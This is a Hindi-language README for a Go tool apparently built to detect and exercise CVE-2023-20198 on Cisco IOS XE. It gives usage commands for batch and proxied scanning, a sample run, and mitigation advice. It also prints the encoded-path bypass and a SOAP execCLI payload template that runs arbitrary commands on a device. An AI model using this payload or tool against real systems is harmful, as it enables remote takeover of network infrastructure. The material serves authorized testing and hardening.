
Cisco IOS XE उपकरणों में CVE-2023-20198 का पता लगाने के लिए Go-आधारित भेद्यता स्कैनर। बैच स्कैनिंग और HTML रिपोर्ट जनरेशन के साथ दूरस्थ कोड निष्पादन के लिए SOAP/XML इंटरफेस (WSMA) का परीक्षण करता है।
सिस्को IOS XE उपकरणों में CVE-2023-20198 का पता लगाने के लिए एक पेशेवर भेद्यता स्कैनर। कमजोर SOAP/XML इंटरफेस (WSMA) का परीक्षण करता है। अधिकृत सुरक्षा मूल्यांकन और नेटवर्क ऑडिटिंग के लिए डिज़ाइन किया गया।
केवल अधिकृत सुरक्षा परीक्षण के लिए
यह उपकरण केवल इसके लिए अभिप्रेत है:
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है।
go install का उपयोग करना (अनुशंसित)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
बाइनरी आपके $GOPATH/bin निर्देशिका (आमतौर पर ~/go/bin) में स्थापित हो जाएगी।
# रिपॉजिटरी क्लोन करें
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# बिल्ड करें
go build -o cisco-cve-2023-20198-checker
# स्थापित करें (वैकल्पिक)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# एकल लक्ष्य जांचें
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# एकाधिक लक्ष्य जांचें
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# HTML रिपोर्ट जनरेट करें
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
कॉरपोरेट वातावरण के लिए एकदम सही! समर्थन करता है:
# HTTP प्रॉक्सी
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH टनल)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# पर्यावरण चर
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
विस्तृत प्रॉक्सी कॉन्फ़िगरेशन के लिए PROXY_GUIDE.md देखें।
# मूल भेद्यता जांच
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# कस्टम पोर्ट
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# विशिष्ट कमांड निष्पादित करें
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# रिपोर्ट जनरेट करें
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# लक्ष्य फ़ाइल बनाएं
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# सभी लक्ष्यों का परीक्षण करें
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# HTML रिपोर्ट के साथ बैच
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# नेटवर्क गणना
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# संस्करण पता लगाना
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# HTTP प्रॉक्सी के माध्यम से
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 प्रॉक्सी (SSH टनल) के माध्यम से
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# प्रमाणित प्रॉक्सी
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
CVSS स्कोर: 10.0 (गंभीर)
प्रकार: रिमोट कोड निष्पादन (RCE)
प्रभावित: सिस्को IOS XE वेब UI (WSMA)
/%2577ebui_wsma_https (पथ एन्कोडिंग बाईपास)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
यदि आपके उपकरण कमजोर हैं:
1. WSMA अक्षम करें (यदि आवश्यक नहीं)
no ip http server
no ip http secure-server
2. ACL के साथ पहुंच प्रतिबंधित करें
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. फर्मवेयर अपडेट करें - नवीनतम सिस्को सुरक्षा पैच लागू करें
4. मजबूत प्रमाणीकरण सक्षम करें
aaa new-model
aaa authentication login default group tacacs+ local
5. लॉग की निगरानी करें - संदिग्ध SOAP/HTTP गतिविधि पर नज़र रखें
# मानक बिल्ड
go build -o cisco-cve-2023-20198-checker
# अनुकूलित (छोटी बाइनरी)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# विभिन्न प्लेटफार्मों के लिए क्रॉस-कम्पाइल
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ सिस्को SOAP/XML सुरक्षा जांचकर्ता ║
║ शैक्षिक और अधिकृत सुरक्षा मूल्यांकन हेतु ║
╚═══════════════════════════════════════════════════════════╝
[*] कमांड: show version
[*] पोर्ट: 443
[*] टाइमआउट: 10 सेकंड
[1/1] लक्ष्य का परीक्षण: 192.168.1.100:443
[*] SOAP अनुरोध भेजा जा रहा है...
[+] प्रतिक्रिया प्राप्त हुई (स्थिति: 200)
[+] सफल!
╔═══════════════════════════════════════════════════════════╗
║ बैच परिणाम ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - सफल
सिस्को IOS XE सॉफ्टवेयर, संस्करण 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ सारांश ║
╚═══════════════════════════════════════════════════════════╝
कुल लक्ष्य: 1
सफल: 1
असफल: 0
पेशेवर सुरक्षा मूल्यांकन रिपोर्ट जिसमें शामिल है:
योगदान का स्वागत है! कृपया:
MIT लाइसेंस - LICENSE फ़ाइल देखें
यह उपकरण केवल अधिकृत भेद्यता स्कैनिंग के लिए है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं। उन प्रणालियों का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें जिनके आप मालिक नहीं हैं।
सुरक्षा समुदाय के लिए बनाया गया 🛡️
| फ्लैग | प्रकार | डिफ़ॉल्ट | विवरण |
|---|
-target | string | - | एकल लक्ष्य IP/होस्टनाम |
-targets-file | string | - | लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक) |
-port | int | 443 | HTTPS/SOAP पोर्ट |
-username | string | admin | SOAP उपयोगकर्ता नाम |
-password | string | - | आवश्यक। SOAP पासवर्ड |
-command | string | uname -a | निष्पादित करने के लिए कमांड |
-html | bool | false | HTML रिपोर्ट जनरेट करें |
-timeout | int | 10 | अनुरोध टाइमआउट (सेकंड) |
-skip-verify | bool | true | SSL सत्यापन छोड़ें |
-proxy | string | - | प्रॉक्सी URL (http://, https://, socks5://) |